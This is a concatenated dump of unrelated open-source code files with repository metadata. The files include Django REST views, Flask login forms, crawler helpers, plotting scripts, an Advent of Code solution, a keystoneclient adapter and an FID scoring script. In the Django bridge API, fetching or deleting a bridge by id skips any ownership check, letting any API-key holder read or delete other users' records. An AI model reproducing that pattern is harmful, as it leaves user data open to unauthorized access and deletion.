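        Fee(filing_type='OTANN', fee_start_date=date(2019, 1, 1),
            fee_end_date=date(2019, 12, 31)),
        Fee(filing_type='OTANN', fee_start_date=date(2020, 1, 1),
            fee_end_date=None),
    ])
    session.commit()

    valid_date = date(2021, 6, 1)
    # Only the schedule whose window contains valid_date should match.
    current = session.query(Fee).filter(
        Fee.filing_type == 'OTANN',
        Fee.fee_start_date <= valid_date,
        or_(Fee.fee_end_date.is_(None), Fee.fee_end_date >= valid_date),
    ).one()
    print(current.fee_start_date)   # 2020-01-01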
b3d8640095343bdfd01fd50c769fcf3b9c43d86b
| 2,544
|
py
|
Python
|
packages/sdk/odahuflow/sdk/models/algorithm_source.py
|
odahu/odahuflow
|
58c3220a266a61bb893cf79c4b994569e3445097
|
[
"ECL-2.0",
"Apache-2.0"
] | 12
|
2020-10-13T15:39:52.000Z
|
2021-10-11T17:13:42.000Z
|
packages/sdk/odahuflow/sdk/models/algorithm_source.py
|
odahu/odahuflow
|
58c3220a266a61bb893cf79c4b994569e3445097
|
[
"ECL-2.0",
"Apache-2.0"
] | 475
|
2019-11-18T12:40:47.000Z
|
2022-03-29T21:17:38.000Z
|
packages/sdk/odahuflow/sdk/models/algorithm_source.py
|
odahu/odahuflow
|
58c3220a266a61bb893cf79c4b994569e3445097
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2020-02-25T11:26:10.000Z
|
2021-03-10T12:01:00.000Z
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from odahuflow.sdk.models.base_model_ import Model
from odahuflow.sdk.models.object_storage import ObjectStorage # noqa: F401,E501
from odahuflow.sdk.models.vcs import VCS # noqa: F401,E501
from odahuflow.sdk.models import util
class AlgorithmSource(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, object_storage: ObjectStorage=None, vcs: VCS=None): # noqa: E501
"""AlgorithmSource - a model defined in Swagger
:param object_storage: The object_storage of this AlgorithmSource. # noqa: E501
:type object_storage: ObjectStorage
:param vcs: The vcs of this AlgorithmSource. # noqa: E501
:type vcs: VCS
"""
self.swagger_types = {
'object_storage': ObjectStorage,
'vcs': VCS
}
self.attribute_map = {
'object_storage': 'objectStorage',
'vcs': 'vcs'
}
self._object_storage = object_storage
self._vcs = vcs
@classmethod
def from_dict(cls, dikt) -> 'AlgorithmSource':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The AlgorithmSource of this AlgorithmSource. # noqa: E501
:rtype: AlgorithmSource
"""
return util.deserialize_model(dikt, cls)
@property
def object_storage(self) -> ObjectStorage:
"""Gets the object_storage of this AlgorithmSource.
:return: The object_storage of this AlgorithmSource.
:rtype: ObjectStorage
"""
return self._object_storage
@object_storage.setter
def object_storage(self, object_storage: ObjectStorage):
"""Sets the object_storage of this AlgorithmSource.
:param object_storage: The object_storage of this AlgorithmSource.
:type object_storage: ObjectStorage
"""
self._object_storage = object_storage
@property
def vcs(self) -> VCS:
"""Gets the vcs of this AlgorithmSource.
:return: The vcs of this AlgorithmSource.
:rtype: VCS
"""
return self._vcs
@vcs.setter
def vcs(self, vcs: VCS):
"""Sets the vcs of this AlgorithmSource.
:param vcs: The vcs of this AlgorithmSource.
:type vcs: VCS
"""
self._vcs = vcs
| 27.354839
| 88
| 0.638758
|
1e002a1aa14324a06078eed6fee7d1563c725070
| 7,186
|
py
|
Python
|
oapi/views.py
|
vantagecrypto/OV_Data_Bridge
|
b09f58e9c4664fa9842eead95b3e54a8027870e2
|
[
"MIT"
] | null | null | null |
oapi/views.py
|
vantagecrypto/OV_Data_Bridge
|
b09f58e9c4664fa9842eead95b3e54a8027870e2
|
[
"MIT"
] | null | null | null |
oapi/views.py
|
vantagecrypto/OV_Data_Bridge
|
b09f58e9c4664fa9842eead95b3e54a8027870e2
|
[
"MIT"
] | null | null | null |
from rest_framework.views import APIView
from rest_framework import status
from django.http import JsonResponse
import json
from sectors.common import error
from sectors.common.bridge import common as bridge_common
from db.models import (
TBLApiKey,
TBLBridge,
)
def get_user(request, unique_id):
if TBLApiKey.objects.filter(unique_id=unique_id, api_key=request.headers.get('api-key')).exists():
api_key = TBLApiKey.objects.get(unique_id=unique_id, api_key=request.headers.get('api-key'))
return api_key.user
return None
def api_decorator():
def decorator(func):
def wrapper(self, request, *args, **kwargs):
user = get_user(request, kwargs['param1'])
if user is None:
text = error.INVALID_UNIQUE_ID_API_KEY
status_code = status.HTTP_401_UNAUTHORIZED
return JsonResponse({
'text': text
}, status=status_code)
kwargs['user'] = user
return func(self, request, *args, **kwargs)
return wrapper
return decorator
def parse_bridge_params(request):
payload = request.data
bridge_id = 0
if request.method == 'POST':
if 'type' not in payload:
return {
'status_code': status.HTTP_400_BAD_REQUEST,
'text': '"type" field required for the request.'
}
if 'name' not in payload:
return {
'status_code': status.HTTP_400_BAD_REQUEST,
'text': '"name" field required for the request.'
}
elif request.method == 'PUT':
if 'id' not in payload:
return {
'status_code': status.HTTP_400_BAD_REQUEST,
'text': '"id" field required for the request.'
}
try:
bridge_id = int(payload['id'])
except:
bridge_id = 0
if not bridge_id or not TBLBridge.objects.filter(id=bridge_id).exists():
return {
'status_code': status.HTTP_400_BAD_REQUEST,
'text': error.UNKNOWN_BRIDGE_ID
}
if 'type' not in payload:
bridge_type = TBLBridge.objects.get(id=bridge_id).type
payload['type'] = bridge_common.get_bridge_by_type(bridge_type)['abbreviation']
else:
pass
b = bridge_common.get_bridge_by_abb(payload['type'])
if b is None:
return {
'status_code': status.HTTP_400_BAD_REQUEST,
'text': error.UNKNOWN_BRIDGE_TYPE
}
params = {
'id': bridge_id,
'type': b['type'],
}
if 'name' in payload:
params['name'] = payload['name']
if b['src'] in payload:
params['src_address'] = payload[b['src']]
if b['dst'] in payload:
params['dst_address'] = payload[b['dst']]
if 'format_search' in payload and 'format_re_format' in payload and 'format_any' in payload:
params['format'] = json.dumps({
'search_word': payload['format_search'],
'replace_word': payload['format_re_format'],
'any': True if payload['format_any'].lower() == 'yes' else False
})
if 'frequency' in payload:
params['frequency'] = payload['frequency']
if 'flush' in payload:
params['flash'] = payload['flush']
if 'file_format' in payload:
params['file_format'] = payload['file_format']
return {
'status_code': status.HTTP_200_OK,
'params': params
}
class BridgeApi(APIView):
@api_decorator()
def post(self, request, *args, **kwargs):
bridge_info = {}
resp_data = parse_bridge_params(request)
if resp_data['status_code'] < 300:
resp_data, bridge = bridge_common.save_bridge(request, resp_data['params'], kwargs['user'])
if resp_data['status_code'] < 300:
bridge_info['id'] = bridge.id
if not bridge_info:
bridge_info = resp_data['text']
return JsonResponse(bridge_info, status=resp_data['status_code'])
@api_decorator()
def get(self, request, *args, **kwargs):
payload = request.data
status_code = status.HTTP_200_OK
if 'id' not in payload:
resp_data = '"id" field required for the request.'
status_code = status.HTTP_400_BAD_REQUEST
else:
resp_data = []
if payload['id'] == 'all':
                bridges_obj = TBLBridge.objects.filter(user_id=kwargs['user'].id)
else:
try:
bridge_id = int(payload['id'])
bridges_obj = TBLBridge.objects.filter(id=bridge_id)
except:
bridges_obj = []
status_code = status.HTTP_400_BAD_REQUEST
for bridge in bridges_obj:
b = bridge_common.get_bridge_by_type(bridge.type)
b_info = {
'id': bridge.id,
'name': bridge.name,
'type': b['abbreviation'],
b['src']: bridge.src_address,
b['dst']: bridge.dst_address
}
if bridge.format:
bridge_format = json.loads(bridge.format)
b_info['format_search'] = bridge_format['search_word']
b_info['format_re_format'] = bridge_format['replace_word']
b_info['format_any'] = 'Yes' if bridge_format['any'] else 'No'
if bridge.frequency:
b_info['frequency'] = bridge.frequency
if bridge.flush:
b_info['flush'] = bridge.flush
if bridge.file_format:
b_info['file_format'] = bridge.file_format
resp_data.append(b_info)
return JsonResponse(resp_data, status=status_code, safe=False)
@api_decorator()
def put(self, request, *args, **kwargs):
resp_data = parse_bridge_params(request)
if resp_data['status_code'] < 300:
resp_data, _ = bridge_common.save_bridge(request, resp_data['params'], kwargs['user'])
if resp_data['status_code'] < 300:
return JsonResponse('', status=status.HTTP_202_ACCEPTED, safe=False)
return JsonResponse(resp_data['text'], status=resp_data['status_code'])
@api_decorator()
def delete(self, request, *args, **kwargs):
payload = request.data
resp_data = ''
status_code = status.HTTP_202_ACCEPTED
if 'id' not in payload:
resp_data = '"id" field required for the request.'
status_code = status.HTTP_400_BAD_REQUEST
else:
if payload['id'] == 'all':
                TBLBridge.objects.filter(user_id=kwargs['user'].id).delete()
else:
try:
bridge_id = int(payload['id'])
TBLBridge.objects.filter(id=bridge_id).delete()
except:
status_code = status.HTTP_406_NOT_ACCEPTABLE
return JsonResponse(resp_data, status=status_code, safe=False)
| 33.115207
| 103
| 0.56624
|
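The api_decorator above resolves the caller from an API key before the view runs and short-circuits with a 401 payload otherwise. A framework-free sketch of the same shape, with an in-memory dict standing in for TBLApiKey and plain dicts for requests and responses:

API_KEYS = {"abc123": "alice"}   # stands in for the TBLApiKey lookup

def require_api_key(func):
    def wrapper(request, *args, **kwargs):
        user = API_KEYS.get(request.get("api-key"))
        if user is None:
            return {"status": 401, "text": "invalid api key"}
        kwargs["user"] = user
        return func(request, *args, **kwargs)
    return wrapper

@require_api_key
def list_bridges(request, **kwargs):
    return {"status": 200, "owner": kwargs["user"], "bridges": []}

print(list_bridges({"api-key": "abc123"}))   # {'status': 200, 'owner': 'alice', 'bridges': []}
print(list_bridges({"api-key": "wrong"}))    # {'status': 401, 'text': 'invalid api key'}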
0d8833f8ab2546ada196d308923ce6128c8b4e32
| 1,049
|
py
|
Python
|
general.py
|
indrajit15/WebCrawler_Python
|
e5836e8da05532f2b7d6f5f1e9e409fe154cd80b
|
[
"MIT"
] | null | null | null |
general.py
|
indrajit15/WebCrawler_Python
|
e5836e8da05532f2b7d6f5f1e9e409fe154cd80b
|
[
"MIT"
] | null | null | null |
general.py
|
indrajit15/WebCrawler_Python
|
e5836e8da05532f2b7d6f5f1e9e409fe154cd80b
|
[
"MIT"
] | null | null | null |
import os
def create_directory(directory):
if( not os.path.exists(directory)):
print("creating project "+ directory)
os.makedirs(directory)
#create queue and crawled files
def create_data_files(project_name,base_url):
queue=project_name+'/queue.txt'
crawled=project_name+'/crawled.txt'
if(not os.path.isfile(queue)):
write_file(queue,base_url)
if(not os.path.isfile(crawled)):
write_file(crawled,'')
#create a new file
def write_file(path, data):
f=open(path,'w')
f.write(data)
f.close()
#appending data to an existing file
def append_data(path,data):
with open(path,'a') as file:
file.write(data+"\n")
#deleting contents
def delete_file_contents(path):
with open(path,'w'):
pass
#file to set
def file_to_set(file_name):
results=set()
with open(file_name,'rt') as f:
for line in f:
results.add(line.replace('\n',''))
return results
#set to a different file
def set_to_file(links,file):
delete_file_contents(file)
for link in sorted(links):
append_data(file,link)
| 23.840909
| 46
| 0.700667
|
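Assuming the helpers above are saved as general.py on the import path, a typical call sequence for seeding and updating a crawl queue looks like this (the project name and URLs are placeholders):

from general import create_directory, create_data_files, file_to_set, set_to_file

PROJECT = 'example_project'
create_directory(PROJECT)
create_data_files(PROJECT, 'https://example.com/')

# Read the queue back as a set, add a link, and persist it again.
queue = file_to_set(PROJECT + '/queue.txt')
queue.add('https://example.com/about')
set_to_file(queue, PROJECT + '/queue.txt')
print(sorted(queue))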
c35b3d1b3c5f9dad59deab779cde39baf905ba32
| 1,805
|
py
|
Python
|
Labs/ComplexitySparseMatrices/plots.py
|
jessicaleete/numerical_computing
|
cc71f51f35ca74d00e617af3d1a0223e19fb9a68
|
[
"CC-BY-3.0"
] | 10
|
2016-10-18T19:54:25.000Z
|
2021-10-09T20:12:38.000Z
|
Labs/ComplexitySparseMatrices/plots.py
|
jessicaleete/numerical_computing
|
cc71f51f35ca74d00e617af3d1a0223e19fb9a68
|
[
"CC-BY-3.0"
] | null | null | null |
Labs/ComplexitySparseMatrices/plots.py
|
jessicaleete/numerical_computing
|
cc71f51f35ca74d00e617af3d1a0223e19fb9a68
|
[
"CC-BY-3.0"
] | 2
|
2017-05-14T16:07:59.000Z
|
2020-06-20T09:05:06.000Z
|
import matplotlib
matplotlib.rcParams = matplotlib.rc_params_from_file('../../matplotlibrc')
import numpy as np
from matplotlib import pyplot as plt
from scipy import sparse
def upper_bound():
x = np.linspace(25, 200)
y1 = 2*x**3
y2 = (1.5)*x**3+75*x**2+250*x+30
plt.plot(x, y2, label="f(n)")
plt.plot(x, y1, label="2n^3")
plt.legend(loc='upper left')
plt.savefig('asymp_upper_bound.pdf')
def solution1_new():
x = np.array([100, 200, 400, 800])
y1 = np.array([.584, 1.17, 2.34, 4.66])
y2 = np.array([.648, 2.35, 9.05, 35.7])
y3 = np.array([.592, 2.59, 10.4, 41.2])
y4 = np.array([.591, 3.05, 19.1, 135])
y5 = np.array([.579, 2.59, 15.1, 95.5])
plt.plot(x, y1, label="Function 1")
plt.plot(x, y2, label="Function 2")
plt.plot(x, y3, label="Function 3")
plt.plot(x, y4, label="Function 4")
plt.plot(x, y5, label="Function 5")
plt.legend(loc='upper left')
plt.savefig('complexity_problem.pdf')
def solution1():
runtimes = [8.95, 36.7, 144, 557]
inputs = [1000, 2000, 4000, 8000]
plt.plot(inputs, runtimes, 'go')
plt.savefig('prob1.pdf')
def spy_sparse():
n = 10000
B = np.random.rand(3, n)
A = sparse.spdiags(B, range(-1, 2), n, n)
plt.spy(A)
plt.savefig('spy.pdf')
def complexitycurves():
plt.clf()
x = np.linspace(.01, 20, 500)
plt.plot(x, np.log2(x)*x, label='$n\log n$')
plt.plot(x, x, label='$n$')
plt.plot(x, x**2, label='$n^2$')
plt.plot(x, 2**x, label='$2^n$')
plt.axis([0., 20., 0., 90.])
plt.xlabel("Problem size (n)")
plt.ylabel("Execution time")
plt.legend(loc=2)
plt.savefig("complexitycurves.pdf")
if __name__ == "__main__":
spy_sparse()
complexitycurves()
solution1()
upper_bound()
solution1_new()
| 28.203125
| 74
| 0.587812
|
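A quick way to sanity-check the runtimes hard-coded in solution1 above is to fit a line through the points on log-log axes; the fitted slope approximates the exponent of the growth rate. A NumPy-only sketch:

import numpy as np

inputs = np.array([1000, 2000, 4000, 8000])
runtimes = np.array([8.95, 36.7, 144, 557])

# log(t) ~ k*log(n) + c, so the fitted slope k is the empirical exponent.
slope, intercept = np.polyfit(np.log(inputs), np.log(runtimes), 1)
print(round(slope, 2))   # roughly 2.0, i.e. O(n^2) growth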
b9ce72293f62d8662301660af2452243d587cad9
| 1,955
|
py
|
Python
|
src/08.py
|
peppermintpatty5/advent2021
|
e11528a26e2be37bbc0943b1b7962dc7006fab63
|
[
"MIT"
] | null | null | null |
src/08.py
|
peppermintpatty5/advent2021
|
e11528a26e2be37bbc0943b1b7962dc7006fab63
|
[
"MIT"
] | null | null | null |
src/08.py
|
peppermintpatty5/advent2021
|
e11528a26e2be37bbc0943b1b7962dc7006fab63
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
def part1(input_txt: str) -> int:
left_sides = []
right_sides = []
for line in input_txt.splitlines():
a, b = line.split(" | ")
left_sides.append(a.split())
right_sides.append(b.split())
return sum(sum(1 for x in item if len(x) in (2, 3, 4, 7)) for item in right_sides)
def calc_output(left_side: list, right_side: list) -> int:
"""
Calculate the 4-digit output value of the entry.
"""
unique_patterns = {2: "1", 3: "7", 4: "4", 7: "8"}
signal_patterns = [set(x) for x in left_side]
p = {}
# identify the 1, 4, 7, and 8
for pattern in signal_patterns:
if len(pattern) in unique_patterns:
digit = unique_patterns[len(pattern)]
p[digit] = pattern
# identify the 0, 6, and 9
for pattern in signal_patterns:
if len(pattern) == 6:
if p["4"] <= pattern:
p["9"] = pattern
elif p["1"] <= pattern:
p["0"] = pattern
else:
p["6"] = pattern
# identify the 2, 3, and 5
for pattern in signal_patterns:
if len(pattern) == 5:
if p["1"] <= pattern:
p["3"] = pattern
elif pattern <= p["6"]:
p["5"] = pattern
else:
p["2"] = pattern
p_inv = {"".join(sorted(pattern)): digit for digit, pattern in p.items()}
return int("".join(p_inv["".join(sorted(x))] for x in right_side))
def part2(input_txt: str) -> int:
left_sides = []
right_sides = []
for line in input_txt.splitlines():
a, b = line.split(" | ")
left_sides.append(a.split())
right_sides.append(b.split())
return sum(calc_output(l, r) for l, r in zip(left_sides, right_sides))
def main():
input_txt = sys.stdin.read()
print(part1(input_txt))
print(part2(input_txt))
if __name__ == "__main__":
main()
| 26.066667
| 86
| 0.53913
|
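Because the file name starts with a digit, src/08.py cannot be imported with a plain import statement; importlib works. The sketch below assumes it is run from the repository root and feeds an entry built from the standard (identity-wired) seven-segment patterns, so the decoded output is known to be 1234.

import importlib.util

# The module name starts with a digit, so load it with importlib.
spec = importlib.util.spec_from_file_location("day08", "src/08.py")
day08 = importlib.util.module_from_spec(spec)
spec.loader.exec_module(day08)

# Identity wiring: the ten standard segment patterns on the left,
# and the digits 1, 2, 3, 4 on the right.
entry = ("abcefg cf acdeg acdfg bcdf abdfg abdefg acf abcdefg abcdfg | "
         "cf acdeg acdfg bcdf")
left, right = (side.split() for side in entry.split(" | "))
print(day08.calc_output(left, right))   # 1234
print(day08.part1(entry))               # 2 (only "1" and "4" have unique lengths)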
6e5af481a2ef7be7a8b0fec552bb29a2b6979da4
| 4,163
|
py
|
Python
|
keystoneclient/adapter.py
|
jamielennox/python-keystoneclient
|
a1bc48c0fc475db6bca761a9023c35adab740dab
|
[
"Apache-1.1"
] | null | null | null |
keystoneclient/adapter.py
|
jamielennox/python-keystoneclient
|
a1bc48c0fc475db6bca761a9023c35adab740dab
|
[
"Apache-1.1"
] | null | null | null |
keystoneclient/adapter.py
|
jamielennox/python-keystoneclient
|
a1bc48c0fc475db6bca761a9023c35adab740dab
|
[
"Apache-1.1"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystoneclient import utils
class Adapter(object):
"""An instance of a session with local variables.
A session is a global object that is shared around amongst many clients. It
therefore contains state that is relevant to everyone. There is a lot of
state such as the service type and region_name that are only relevant to a
particular client that is using the session. An adapter provides a wrapper
of client local data around the global session object.
"""
@utils.positional()
def __init__(self, session, service_type=None, service_name=None,
interface=None, region_name=None, auth=None,
user_agent=None):
"""Create a new adapter.
:param Session session: The session object to wrap.
:param str service_type: The default service_type for URL discovery.
:param str service_name: The default service_name for URL discovery.
:param str interface: The default interface for URL discovery.
:param str region_name: The default region_name for URL discovery.
:param auth.BaseAuthPlugin auth: An auth plugin to use instead of the
session one.
:param str user_agent: The User-Agent string to set.
"""
self.session = session
self.service_type = service_type
self.service_name = service_name
self.interface = interface
self.region_name = region_name
self.user_agent = user_agent
self.auth = auth
def request(self, url, method, **kwargs):
endpoint_filter = kwargs.setdefault('endpoint_filter', {})
if self.service_type:
endpoint_filter.setdefault('service_type', self.service_type)
if self.service_name:
endpoint_filter.setdefault('service_name', self.service_name)
if self.interface:
endpoint_filter.setdefault('interface', self.interface)
if self.region_name:
endpoint_filter.setdefault('region_name', self.region_name)
if self.auth:
kwargs.setdefault('auth', self.auth)
if self.user_agent:
kwargs.setdefault('user_agent', self.user_agent)
return self.session.request(url, method, **kwargs)
def get(self, url, **kwargs):
return self.request(url, 'GET', **kwargs)
def head(self, url, **kwargs):
return self.request(url, 'HEAD', **kwargs)
def post(self, url, **kwargs):
return self.request(url, 'POST', **kwargs)
def put(self, url, **kwargs):
return self.request(url, 'PUT', **kwargs)
def patch(self, url, **kwargs):
return self.request(url, 'PATCH', **kwargs)
def delete(self, url, **kwargs):
return self.request(url, 'DELETE', **kwargs)
class LegacyJsonAdapter(Adapter):
"""Make something that looks like an old HTTPClient.
A common case when using an adapter is that we want an interface similar to
the HTTPClients of old which returned the body as JSON as well.
You probably don't want this if you are starting from scratch.
"""
def request(self, *args, **kwargs):
headers = kwargs.setdefault('headers', {})
headers.setdefault('Accept', 'application/json')
try:
kwargs['json'] = kwargs.pop('body')
except KeyError:
pass
resp = super(LegacyJsonAdapter, self).request(*args, **kwargs)
body = None
if resp.text:
try:
body = resp.json()
except ValueError:
pass
return resp, body
| 35.887931
| 79
| 0.652174
|
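Stripped of the Keystone specifics, the Adapter above is a thin wrapper that injects per-client defaults into every request before delegating to a shared session. A self-contained sketch of that pattern; FakeSession and ScopedAdapter are illustrative names, not part of keystoneclient:

class FakeSession:
    """Stand-in for the shared session: it echoes back what it was asked to do."""
    def request(self, url, method, **kwargs):
        return {"url": url, "method": method, "kwargs": kwargs}

class ScopedAdapter:
    def __init__(self, session, **defaults):
        self.session = session
        self.defaults = defaults

    def request(self, url, method, **kwargs):
        # Only fill in values the caller did not supply explicitly.
        for key, value in self.defaults.items():
            kwargs.setdefault(key, value)
        return self.session.request(url, method, **kwargs)

    def get(self, url, **kwargs):
        return self.request(url, "GET", **kwargs)

compute = ScopedAdapter(FakeSession(), service_type="compute", region_name="RegionOne")
print(compute.get("/servers"))
# {'url': '/servers', 'method': 'GET',
#  'kwargs': {'service_type': 'compute', 'region_name': 'RegionOne'}}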
61b49cf481c4992f4b2e8bd881a6b165508802e5
| 2,959
|
py
|
Python
|
fid_varying_renyigan.py
|
renyigan-lkgan/RenyiGAN
|
c4bbb86e6037e0b95ee4c00c18729a8a8a3d2946
|
[
"MIT"
] | null | null | null |
fid_varying_renyigan.py
|
renyigan-lkgan/RenyiGAN
|
c4bbb86e6037e0b95ee4c00c18729a8a8a3d2946
|
[
"MIT"
] | 1
|
2020-09-25T22:37:05.000Z
|
2020-09-25T22:37:05.000Z
|
fid_varying_renyigan.py
|
vincihb/RenyiGAN
|
c4bbb86e6037e0b95ee4c00c18729a8a8a3d2946
|
[
"MIT"
] | 1
|
2020-10-07T19:14:21.000Z
|
2020-10-07T19:14:21.000Z
|
# Raw FID scores over epochs
import tensorflow as tf
import numpy as np
import scipy as sp
import multiprocessing
import os
class Process:
def __init__(self):
print("Evaluating images")
def fid(self, info1, info2):
(mu1, cov1) = info1 # p_x
(mu2, cov2) = info2 # p_g
covSqrt = sp.linalg.sqrtm(np.matmul(cov1, cov2))
if np.iscomplexobj(covSqrt):
covSqrt = covSqrt.real
fidScore = np.linalg.norm(mu1 - mu2) + np.trace(cov1 + cov2
- 2 * covSqrt)
return fidScore
def __call__(self, info):
(string1, img2, info1) = info
mu2 = img2.mean(axis=0)
cov2 = np.cov(np.transpose(img2))
score = self.fid(info1, (mu2, cov2))
# print("For alpha = " + string1 + " the FID value is " + str(score))
return score
def main():
version = int(ver)
subversion = int(subver)
trial_num = int(trial_n)
(trainIm, trainL), (_, _) = tf.keras.datasets.mnist.load_data()
trainIm = trainIm.reshape(trainIm.shape[0], 28, 28, 1).astype('float32')
trainIm = trainIm[np.random.choice(50000, 10000, replace=False), :, :, :]
trainIm = trainIm.reshape(10000, 28 * 28).astype('float32')
trainIm = trainIm / 255.0
print(trainIm.shape)
mu1 = trainIm.mean(axis=0)
trainIm = np.transpose(trainIm)
cov1 = np.cov(trainIm)
info1 = (mu1, cov1)
proc = Process()
pool = multiprocessing.Pool(processes=16)
while trial_num < trial_num + 1:
print(trial_num)
pFiles = []
for epoch in range(250):
p = np.load('data/annealing/v' + str(version) + '-' + str(subversion) + '/trial' + str(trial_num)
+ '/predictions' + str(epoch) + '.npy')
p = p.reshape(p.shape[1], 28, 28, 1).astype('float32')
p = p[np.random.choice(50000, 10000, replace=False), :, :, :]
p = p.reshape(10000, 28 * 28).astype('float32')
p = (p * 127.5 + 127.5) / 255.0
if np.isnan(p).any():
break
pFiles.append(('sim_ann_epoch' + str(epoch), p, info1))
score_list = pool.map(proc, pFiles)
np.save('data/annealing/v' + str(version) + '-' + str(subversion) + '/trial' + str(trial_num) + '/scores.npy', score_list)
print(score_list)
# If you are running low on space, uncomment the below code to automatically delete all
# predictions.npy files except for the one that has the lowest FID score.
#for epoch in range(250):
# if epoch != np.nanargmin(score_list):
# os.remove('data/annealing/v' + str(version) + '-' + str(subversion) + '/trial' + str(trial_num)
# + '/predictions' + str(epoch) + '.npy')
trial_num = trial_num + 1
if __name__ == "__main__":
ver, subver, trial_n = input("Version, subversion, trial_num: ").split()
main()
| 38.934211
| 130
| 0.569111
|
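The fid method above computes a Frechet-distance style score from sample means and covariances; the textbook FID is ||mu1 - mu2||^2 + Tr(C1 + C2 - 2(C1 C2)^(1/2)) (note the method above uses the unsquared norm of the mean difference). A standalone numerical check of the textbook formula on two synthetic Gaussian samples, where the expected value is about 8 * 0.5^2 = 2:

import numpy as np
import scipy.linalg

rng = np.random.default_rng(0)
x = rng.normal(0.0, 1.0, size=(5000, 8))   # samples from p_x
g = rng.normal(0.5, 1.0, size=(5000, 8))   # samples from p_g

def frechet_distance(a, b):
    mu1, mu2 = a.mean(axis=0), b.mean(axis=0)
    cov1, cov2 = np.cov(a, rowvar=False), np.cov(b, rowvar=False)
    cov_sqrt = scipy.linalg.sqrtm(cov1 @ cov2)
    if np.iscomplexobj(cov_sqrt):
        cov_sqrt = cov_sqrt.real
    return np.sum((mu1 - mu2) ** 2) + np.trace(cov1 + cov2 - 2.0 * cov_sqrt)

print(frechet_distance(x, g))   # roughly 2.0 for these two Gaussians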
124eee9c90a3aaedea34868b9f1219a0adb9bd5e
| 4,132
|
py
|
Python
|
app/auth/forms.py
|
NamelessAshone/trade_system
|
f4fbd14f84962a22aef41a719d3996d8cd691148
|
[
"MIT"
] | 2
|
2018-09-07T02:39:37.000Z
|
2018-10-18T13:59:38.000Z
|
app/auth/forms.py
|
NamelessAshone/trade_system
|
f4fbd14f84962a22aef41a719d3996d8cd691148
|
[
"MIT"
] | null | null | null |
app/auth/forms.py
|
NamelessAshone/trade_system
|
f4fbd14f84962a22aef41a719d3996d8cd691148
|
[
"MIT"
] | null | null | null |
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField
from wtforms.validators import Required, Length, Email, Regexp, EqualTo
from wtforms import ValidationError
from ..models import User
class LoginForm(FlaskForm):
email = StringField('Email', validators=[Required(), Length(1, 64),
Email()])
password = PasswordField('Password', validators=[Required()])
remember_me = BooleanField('Keep me logged in')
submit = SubmitField('Log In')
class RegistrationForm(FlaskForm):
email = StringField('Email', validators=[Required(), Length(1, 64),
Email()])
username = StringField('Username', validators=[
Required(), Length(1, 64), Regexp('^[A-Za-z][A-Za-z0-9_.]*$', 0,
'Usernames must have only letters, '
'numbers, dots or underscores.')])
password = PasswordField('Password', validators=[
Required(), EqualTo('password2', message='Passwords must match.')])
password2 = PasswordField('Confirm password', validators=[Required()])
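    # The regex below accepts 11-digit numbers starting with 1[3-9] or 9[28].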
tel = StringField('Tel', validators=[
        Required(), Regexp(r'^(?:^1[3456789]|^9[28])\d{9}$',
0,
'Bad telephone number, please try again.')])
bank_account = StringField('Bank account', validators=[
        Required(), Regexp(r'^([\d]{4})([\d]{4})([\d]{4})([\d]{4})([\d]{0,})?$',
0,
'Bad bank account, please try again.')])
submit = SubmitField('Register')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise ValidationError('Email already registered.')
def validate_username(self, field):
if User.query.filter_by(username=field.data).first():
raise ValidationError('Username already in use.')
class ChangePasswordForm(FlaskForm):
old_password = PasswordField('Old password', validators=[Required()])
password = PasswordField('New password', validators=[
Required(), EqualTo('password2', message='Passwords must match')])
password2 = PasswordField('Confirm new password', validators=[Required()])
submit = SubmitField('Update Password')
class PasswordResetRequestForm(FlaskForm):
email = StringField('Email', validators=[Required(), Length(1, 64),
Email()])
submit = SubmitField('Reset Password')
class PasswordResetForm(FlaskForm):
email = StringField('Email', validators=[Required(), Length(1, 64),
Email()])
password = PasswordField('New Password', validators=[
Required(), EqualTo('password2', message='Passwords must match')])
password2 = PasswordField('Confirm password', validators=[Required()])
submit = SubmitField('Reset Password')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first() is None:
raise ValidationError('Unknown email address.')
class ChangeEmailForm(FlaskForm):
email = StringField('New Email', validators=[Required(), Length(1, 64),
Email()])
password = PasswordField('Password', validators=[Required()])
submit = SubmitField('Update Email Address')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise ValidationError('Email already registered.')
class ChangeUserInfo(FlaskForm):
tel = StringField('New tel', validators=[
        Required(), Regexp(r'^(?:^1[3456789]|^9[28])\d{9}$',
0,
'Bad telephone number, please try again.')])
bank_account = StringField('New bank account', validators=[
        Required(), Regexp(r'^([\d]{4})([\d]{4})([\d]{4})([\d]{4})([\d]{0,})?$',
0,
'Bad bank account, please try again.')])
submit = SubmitField('commit')
| 44.430108
| 79
| 0.589061
|
c3086208c003d93c8ed11481f7f5708452f89d6f
| 68,582
|
py
|
Python
|
salt/cloud/clouds/azurearm.py
|
guoxiaod/salt
|
2cd6c03b40932be137e6e8a672967b59025a2d34
|
[
"Apache-2.0"
] | null | null | null |
salt/cloud/clouds/azurearm.py
|
guoxiaod/salt
|
2cd6c03b40932be137e6e8a672967b59025a2d34
|
[
"Apache-2.0"
] | null | null | null |
salt/cloud/clouds/azurearm.py
|
guoxiaod/salt
|
2cd6c03b40932be137e6e8a672967b59025a2d34
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Azure ARM Cloud Module
======================
.. versionadded:: 2016.11.0
.. versionchanged:: Fluorine
The Azure ARM cloud module is used to control access to Microsoft Azure Resource Manager
:depends:
* `azure <https://pypi.python.org/pypi/azure>`_ >= 2.0.0rc6
* `azure-common <https://pypi.python.org/pypi/azure-common>`_ >= 1.1.4
* `azure-mgmt <https://pypi.python.org/pypi/azure-mgmt>`_ >= 0.30.0rc6
